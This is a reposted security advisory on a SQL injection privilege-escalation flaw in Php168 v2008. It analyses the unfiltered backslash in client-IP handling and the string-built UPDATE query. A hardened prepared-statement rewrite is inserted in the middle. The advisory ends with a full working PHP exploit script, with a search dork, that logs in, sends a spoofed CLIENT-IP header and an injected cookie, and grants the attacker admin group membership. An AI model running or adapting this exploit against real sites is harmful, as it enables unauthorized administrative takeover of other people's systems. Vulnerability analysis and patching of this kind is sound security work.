Php168 v2008 Privilege Escalation Vulnerability

admin · 2017-05-05 21:50:59 · 336 views · 3945 characters · 13 min 9 s read

by Ryat
http://www.wolvez.org
2009-01-25

A brief analysis of this vulnerability.

common.inc.php:

```php
if($_SERVER['HTTP_CLIENT_IP']){
    $onlineip=$_SERVER['HTTP_CLIENT_IP'];
}elseif($_SERVER['HTTP_X_FORWARDED_FOR']){
    $onlineip=$_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
    $onlineip=$_SERVER['REMOTE_ADDR'];
}
$onlineip = preg_replace("/^([\d\.]+).*/", "\\1", filtrate($onlineip));
// Using preg_replace here is a security risk: a vulnerability was disclosed at this spot before,
// and the vendor's fix was simply to run $onlineip through the filtrate() function.
```

Let's look at what the filtrate function actually does.

function.inc.php:

```php
function filtrate($msg){
    $msg = str_replace('&amp;','&',$msg);
    $msg = str_replace('&nbsp;',' ',$msg);
    $msg = str_replace('"','&quot;',$msg);
    $msg = str_replace("'",'&#39;',$msg);
    $msg = str_replace("<","&lt;",$msg);
    $msg = str_replace(">","&gt;",$msg);
    $msg = str_replace("\t","   &nbsp;  &nbsp;",$msg);
    $msg = str_replace("\r","",$msg);
    $msg = str_replace("   "," &nbsp; ",$msg);
    return $msg;
}
```

It filters ', ", < and so on, but does nothing about the backslash \.

common.inc.php:

```php
if($usr_oltime>30||!$usr_oltime){
    $usr_oltime>600 && $usr_oltime=600;
    include(PHP168_PATH."php168/level.php");
    if( isset($memberlevel[$lfjdb[groupid]]) ){
        $SQL=",groupid=8";
        $lfjdb[money]=get_money($lfjuid);
        foreach( $memberlevel AS $key=>$value){
            if($lfjdb[money]>=$value){
                $SQL=",groupid=$key";
            }
        }
    }else{
        $SQL="";
    }
    $db->query("UPDATE {$pre}memberdata SET lastvist='$timestamp',lastip='$onlineip',oltime=oltime+'$usr_oltime'$SQL WHERE uid='$lfjuid'");
    // Because the query is built by string concatenation, a backslash can be used to escape the ',
    // and $usr_oltime is then used for the injection :)
}
```

Also note that $usr_oltime goes through a simple check, and the SQL statement must still be syntactically valid. Here is the statement I constructed:

```
UPDATE {$pre}memberdata SET lastvist='$timestamp',lastip='[\]',oltime=oltime+'[+31,groupid=3,introduce=0x70757265745f74 WHERE uid=2#]'$SQL WHERE uid='$lfjuid'
```
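The two weak spots analysed above are the IP extraction (the regex only strips the tail when the value begins with digits, so a value that starts with a letter passes through untouched, and filtrate() never escapes a backslash) and the UPDATE built by string concatenation. The following is an added example, not PHP168's own code, showing how a defender would rewrite both: only honour proxy headers from a known proxy, require the result to parse as an IP address, and bind every dynamic value as a prepared-statement parameter. The PDO handle, the trusted-proxy list, the SQLite demo table and the sample request values are assumptions made for the example; the table and column names follow the advisory.

```php
<?php
// Added example (not PHP168 code): hardened client-IP extraction and member UPDATE.

/**
 * Derive the client IP without trusting arbitrary header text.
 * Proxy headers are only honoured when REMOTE_ADDR is a known proxy, and the
 * chosen value must validate as an IP address; otherwise REMOTE_ADDR is used.
 * Unlike preg_replace("/^([\d\.]+).*/", ...), a value such as "ryat\" can never
 * reach the database, because it is not a valid IP.
 */
function client_ip(array $server, array $trustedProxies): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    $candidates = [];
    if (in_array($remote, $trustedProxies, true)) {
        foreach (['HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR'] as $header) {
            if (!empty($server[$header])) {
                // X-Forwarded-For may be a comma-separated chain; take the first hop.
                $candidates[] = trim(explode(',', $server[$header])[0]);
            }
        }
    }
    $candidates[] = $remote;
    foreach ($candidates as $ip) {
        if (filter_var($ip, FILTER_VALIDATE_IP) !== false) {
            return $ip;
        }
    }
    return '0.0.0.0';
}

/**
 * Same UPDATE as common.inc.php, but every dynamic value is a bound parameter,
 * $usr_oltime is cast to int and clamped to 0..600, and groupid is only ever a
 * value computed by the caller from $memberlevel, never raw SQL appended to $SQL.
 * $pre is the configured table prefix (assumed to come from config, not from the request).
 */
function update_member(PDO $db, string $pre, int $uid, string $onlineip, int $timestamp, $usr_oltime, ?int $groupid): void
{
    // The (int) cast keeps only the leading number: "+31,groupid=3,..." becomes 31.
    $oltime = max(0, min((int) $usr_oltime, 600));

    $sql = "UPDATE {$pre}memberdata SET lastvist = :ts, lastip = :ip, oltime = oltime + :oltime";
    $params = [':ts' => $timestamp, ':ip' => $onlineip, ':oltime' => $oltime, ':uid' => $uid];
    if ($groupid !== null) {
        $sql .= ", groupid = :gid";
        $params[':gid'] = $groupid;
    }
    $sql .= " WHERE uid = :uid";
    $db->prepare($sql)->execute($params);
}

// Demo against an in-memory SQLite database (assumes the pdo_sqlite extension is loaded).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE memberdata (uid INTEGER PRIMARY KEY, groupid INTEGER, lastvist INTEGER, lastip TEXT, oltime INTEGER, introduce TEXT)");
$db->exec("INSERT INTO memberdata VALUES (2, 8, 0, '', 0, '')");

// Constructed request carrying the header value and oltime string from the advisory.
$server = [
    'REMOTE_ADDR'    => '198.51.100.7',
    'HTTP_CLIENT_IP' => 'ryat\\',
];
$ip = client_ip($server, ['10.0.0.1']); // 198.51.100.7 is not a trusted proxy, so the header is ignored
update_member($db, '', 2, $ip, time(), "+31,groupid=3,introduce=0x70757265745f74 WHERE uid=2#", null);

$row = $db->query("SELECT groupid, lastip, oltime, introduce FROM memberdata WHERE uid = 2")->fetch(PDO::FETCH_ASSOC);
var_dump($row); // groupid stays 8, lastip is 198.51.100.7, oltime is 31, introduce is unchanged
```

The clamp mirrors the original `$usr_oltime>600 && $usr_oltime=600` check but does it on an integer, so there is no string left for the database to parse as SQL; the `introduce` and `groupid` columns can only change through code paths that deliberately bind them.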

Finally, here is the exploit:

```php
#!/usr/bin/php
<?php

print_r('
+---------------------------------------------------------------------------+
Php168 <= v2008 update user access exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by PHP168"
+---------------------------------------------------------------------------+
');

/**
 * works regardless of php.ini settings
 */
if ($argc < 5) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path user pass
host:      target server (ip/hostname)
path:      path to php168
user:      login username
pass:      login password
Example:
php '.$argv[0].' localhost /php168/
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];
$user = $argv[3];
$pass = $argv[4];

// First request: log in and capture the passport cookie (uid is the second capture group)
$resp = send();
preg_match('/Set-Cookie:\s(passport=([0-9]{1,4})%09[a-zA-Z0-9%]+)/', $resp, $cookie);

if ($cookie) {
    // Second request: carry the crafted USR cookie; success is confirmed by reading back 'puret_t'
    if (strpos(send(), 'puret_t') !== false) {
        exit("Exploit Success!\nYou Are Admin Now!\n");
    } else {
        exit("Exploit Failed!\n");
    }
} else {
    exit("Exploit Failed!\n");
}

function rands($length = 8)
{
    $hash = '';
    $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
    $max = strlen($chars) - 1;
    mt_srand((double)microtime() * 1000000);
    for ($i = 0; $i < $length; $i++)
        $hash .= $chars[mt_rand(0, $max)];

    return $hash;
}

function send()
{
    global $host, $path, $user, $pass, $cookie;

    if ($cookie) {
        $cookie[1] .= ';USR='.rands()."\t%2b31,groupid=3,introduce=0x70757265745f74 WHERE uid=$cookie[2]#\t\t";
        $cmd = '';

        $message = "POST ".$path."member/userinfo.php  HTTP/1.1\r\n";
        $message .= "Accept: */*\r\n";
        $message .= "Accept-Language: zh-cn\r\n";
        $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
        $message .= "CLIENT-IP: ryat\\\r\n";
        $message .= "Host: $host\r\n";
        $message .= "Content-Length: ".strlen($cmd)."\r\n";
        $message .= "Connection: Close\r\n";
        $message .= "Cookie: ".$cookie[1]."\r\n\r\n";
        $message .= $cmd;
    } else {
        $cmd = "username=$user&password=$pass&step=2";

        $message = "POST ".$path."login.php  HTTP/1.1\r\n";
        $message .= "Accept: */*\r\n";
        $message .= "Accept-Language: zh-cn\r\n";
        $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
        $message .= "Host: $host\r\n";
        $message .= "Content-Length: ".strlen($cmd)."\r\n";
        $message .= "Connection: Close\r\n\r\n";
        $message .= $cmd;
    }

    $fp = fsockopen($host, 80);
    fputs($fp, $message);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}

?>
```

Reposted on CN-SEC (with thanks to the original author): http://cn-sec.com/archives/46046.html
